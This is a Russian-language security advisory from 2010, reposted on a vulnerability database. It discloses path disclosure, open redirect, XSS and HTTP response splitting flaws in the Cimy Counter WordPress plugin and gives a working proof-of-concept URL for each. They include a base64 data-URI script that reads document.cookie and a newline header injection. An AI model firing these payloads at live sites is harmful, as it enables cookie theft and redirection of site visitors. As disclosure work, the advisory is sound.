Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24131
HistoryJun 25, 2010 - 12:00 a.m.

Vulnerabilities in Cimy Counter for WordPress

2010-06-2500:00:00
vulners.com
12

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure, Redirector, Cross-Site Scripting
и HTTP Response Spitting уязвимостях в плагине Cimy Counter для WordPress.

Full path disclosure:

http://site/wp-content/plugins/cimy-counter/cimy_counter.php

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=%0A1

Redirector:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=http://websecurity.com.ua

XSS:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

HTTP Response Spitting:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test

Работает в старых версиях PHP.

Уязвимы Cimy Counter 0.9.4 и предыдущие версии. В версии Cimy Counter 0.9.5 автор
исправил все указанные уязвимости кроме Redirector.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4170/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua